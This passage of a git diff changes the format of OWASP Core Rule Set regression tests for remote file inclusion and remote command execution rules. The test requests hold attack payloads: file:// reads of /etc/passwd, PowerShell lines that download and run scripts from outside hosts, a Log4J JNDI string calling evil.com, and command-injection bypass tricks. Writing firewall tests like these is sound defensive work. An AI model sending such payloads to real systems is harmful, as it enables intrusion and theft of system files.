text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http://example.com%2f:foo@bar@evil.com/" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 15 desc: basic auth stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http://foo:bar@example.com/" - version: HTTP/1.1 - output: - no_log_contains: id "931130" - - test_title: 931130-16 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http://foo:bar@example.com/" + version: HTTP/1.1 + output: + log: + no_expect_ids: [931130] + - test_id: 16 desc: "Positive test: Remote File Inclusion Attack (931130) - Detect url:file://" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=url:file://foo.bar" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-17 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=url:file://foo.bar" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 17 desc: Remote File Inclusion Attack (931130) - Detect gopher:// stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=gopher://google.com/_SSRFTest!" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-18 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=gopher://google.com/_SSRFTest!" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 18 desc: Remote File Inclusion Attack (931130) - Ldap Protocol stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=ldap://127.0.0.1/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-19 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=ldap://127.0.0.1/" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 19 desc: Remote File Inclusion Attack (931130) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=jar:http://evil.co/b.zip!a" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-20 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=jar:http://evil.co/b.zip!a" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 20 desc: Remote File Inclusion Attack (931130) with Java backend stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=url:file://etc/services" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-21 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=url:file://etc/services" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 21 desc: Remote File Inclusion Attack (931130) with local_file url scheme stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=local_file://something" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-22 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=local_file://something" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 22 desc: Remote File Inclusion Attack (931130) with Java backend and trailing / stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=url:file:///etc/passwd" - version: HTTP/1.1 - output: - log_contains: id "931130" + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=url:file:///etc/passwd" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml index 35e73e0eb..76c23d6eb 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml @@ -1,23 +1,21 @@ --- meta: author: "emphazer, azurit" - description: None - enabled: true - name: 931131.yaml +rule_id: 931131 tests: - - test_title: 931131-1 + - test_id: 1 desc: Remote File Inclusion Attack (931131) with REQUEST_FILENAME stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/file:%2f%2f/usr/src/blog/app/assets/javascripts/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd" - version: HTTP/1.1 - output: - log_contains: id "931131" + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/file:%2f%2f/usr/src/blog/app/assets/javascripts/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd" + version: HTTP/1.1 + output: + log: + expect_ids: [931131] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml index f48d4fe29..9050adb99 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml @@ -1,87 +1,85 @@ --- meta: author: "Paul Beckett, azurit" - enabled: true - name: "932120.yaml" - description: "Tests to trigger or not trigger rule 932120" +rule_id: 932120 tests: - - test_title: 932120-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?932120-1=Invoke-WebRequest%20http://example.com/path/file.ps1" - version: "HTTP/1.1" - output: - log_contains: "id \"932120\"" - - test_title: 932120-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?932120-1=Invoke-WebRequest%20http://example.com/path/file.ps1" + version: "HTTP/1.1" + output: + log: + expect_ids: [932120] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '932120-2=Invoke-WebRequest http://example.com/path/file.ps1' - version: "HTTP/1.1" - output: - log_contains: "id \"932120\"" - - test_title: 932120-3 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '932120-2=Invoke-WebRequest http://example.com/path/file.ps1' + version: "HTTP/1.1" + output: + log: + expect_ids: [932120] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Cookie: "931120-3=Invoke-Expression%20-Command%20file.ps1" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932120\"" - - test_title: 932120-4 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Cookie: "931120-3=Invoke-Expression%20-Command%20file.ps1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932120] + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '932120-4=Invoke Web Request http://example.com/path/file.ps1' - version: "HTTP/1.1" - output: - no_log_contains: "id \"932120\"" - - test_title: 932120-5 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '932120-4=Invoke Web Request http://example.com/path/file.ps1' + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932120] + - test_id: 5 desc: "Test for BB GU2FIXLC - powershell" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'cmd=powershell%20C%3A%5Cwindows%5Csystem32%5Cnotepad.exe' - version: "HTTP/1.1" - output: - log_contains: id "932120" + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'cmd=powershell%20C%3A%5Cwindows%5Csystem32%5Cnotepad.exe' + version: "HTTP/1.1" + output: + log: + expect_ids: [932120] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml index a5df88d85..a4fb0ce80 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml @@ -1,55 +1,53 @@ --- meta: author: "0xInfection" - enabled: true - name: "932125.yaml" - description: "Tests to trigger rule 932125" +rule_id: 932125 tests: - - test_title: 932125-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?cmd=%3Biwr%20http://example.com/path/file.ps1" - version: "HTTP/1.1" - output: - log_contains: id "932125" - - test_title: 932125-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?cmd=%3Biwr%20http://example.com/path/file.ps1" + version: "HTTP/1.1" + output: + log: + expect_ids: [932125] + - test_id: 2 desc: "Test for BB finding VYYFBP5V" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?cmd=%3Biwmi%20-class%20Win32_process%20-name%20Create%20-ArgumentList%20cmd" - version: "HTTP/1.1" - output: - log_contains: id "932125" - - test_title: 932125-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?cmd=%3Biwmi%20-class%20Win32_process%20-name%20Create%20-ArgumentList%20cmd" + version: "HTTP/1.1" + output: + log: + expect_ids: [932125] + - test_id: 3 desc: "Test for BB finding VYYFBP5V" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: cmd=;iex (iwr http://10.0.10.10:8000/x.ps1) - version: "HTTP/1.1" - output: - log_contains: id "932125" + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: cmd=;iex (iwr http://10.0.10.10:8000/x.ps1) + version: "HTTP/1.1" + output: + log: + expect_ids: [932125] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml index b5c8aa173..ba37e6c0c 100755 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml @@ -1,268 +1,266 @@ --- meta: author: "Paul Beckett, Max Leske, azurit" - enabled: true - name: "932130.yaml" - description: "Tests to trigger or not trigger rule 932130" +rule_id: 932130 tests: - - test_title: 932130-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?932130-1=$(cmd)" - version: "HTTP/1.1" - output: - log_contains: 'id "932130"' - - test_title: 932130-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?932130-1=$(cmd)" + version: "HTTP/1.1" + output: + log: + expect_ids: [932130] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "932130-2=${cmd}" - version: "HTTP/1.1" - output: - log_contains: 'id "932130"' - - test_title: 932130-3 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "932130-2=${cmd}" + version: "HTTP/1.1" + output: + log: + expect_ids: [932130] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: "931120-3=<(cmd)" - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: 'id "932130"' - - test_title: 932130-4 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: "931120-3=<(cmd)" + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932130] + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: ">(cmd)=931120-4" - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: 'id "932130"' - - test_title: 932130-5 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: ">(cmd)=931120-4" + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932130] + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "932130-5=Some text (in brackets)." - version: "HTTP/1.1" - output: - no_log_contains: 'id "932130"' - - test_title: 932130-6 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "932130-5=Some text (in brackets)." + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932130] + - test_id: 6 desc: "Log4J exploit picked up by shell exploit detection in body" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${:1337:-x$}{jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: 'id "932130"' - - test_title: 932130-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${:1337:-x$}{jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [932130] + - test_id: 7 desc: "Unix command injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=0.84622338492032948`echo${IFS}crs312``echo${IFS}34test`" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=0.84622338492032948`echo${IFS}crs312``echo${IFS}34test`" + version: HTTP/1.0 + output: + log: + expect_ids: [932130] + - test_id: 8 desc: "Unix command injection - character set bypass technique" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # cat /etc/pa[s]swd - uri: "/get?cmd=cat%20/etc/pa%5Bs%5Dswd" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # cat /etc/pa[s]swd + uri: "/get?cmd=cat%20/etc/pa%5Bs%5Dswd" + version: HTTP/1.0 + output: + log: + expect_ids: [932130] + - test_id: 9 desc: "Unix command injection - character set bypass technique" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # cat /[?]tc/pa[?]swd - uri: "/get?cmd=cat%20/%5B%3F%5Dtc/pa%5B%3F%5Dswd" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # cat /[?]tc/pa[?]swd + uri: "/get?cmd=cat%20/%5B%3F%5Dtc/pa%5B%3F%5Dswd" + version: HTTP/1.0 + output: + log: + expect_ids: [932130] + - test_id: 10 desc: "Unix command injection - character set bypass - negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # hello [text in brackets] - uri: "/get?cmd=hello%20%5Btext%20in%20brackets%5D" - version: HTTP/1.0 - output: - no_log_contains: id "932130" - - test_title: 932130-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # hello [text in brackets] + uri: "/get?cmd=hello%20%5Btext%20in%20brackets%5D" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932130] + - test_id: 11 desc: "Unix command injection - bracket bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?s=/etc/pas[s]wd" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?s=/etc/pas[s]wd" + version: HTTP/1.0 + output: + log: + expect_ids: [932130] + - test_id: 12 desc: "Unix command injection - bracket bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?s=/etc/%5Bp%5Dasswd" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?s=/etc/%5Bp%5Dasswd" + version: HTTP/1.0 + output: + log: + expect_ids: [932130] + - test_id: 13 desc: "Unix command injection - bracket bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?s=/etc/%5B!q%5Dasswd" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?s=/etc/%5B!q%5Dasswd" + version: HTTP/1.0 + output: + log: + expect_ids: [932130] + - test_id: 14 desc: "Unix command injection - bracket bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?s=/etc/%5Bm-z%5Dasswd" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?s=/etc/%5Bm-z%5Dasswd" + version: HTTP/1.0 + output: + log: + expect_ids: [932130] + - test_id: 15 desc: "Unix command injection - bracket bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?s=/usr/bin/%5Bu%5Dname+-a" - version: HTTP/1.0 - output: - log_contains: id "932130" - - test_title: 932130-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?s=/usr/bin/%5Bu%5Dname+-a" + version: HTTP/1.0 + output: + log: + expect_ids: [932130] + - test_id: 16 desc: "Unix command injection - bracket bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?exec=/bi%5Bn%5D/bash" - version: HTTP/1.0 - output: - log_contains: id "932130" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?exec=/bi%5Bn%5D/bash" + version: HTTP/1.0 + output: + log: + expect_ids: [932130] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml 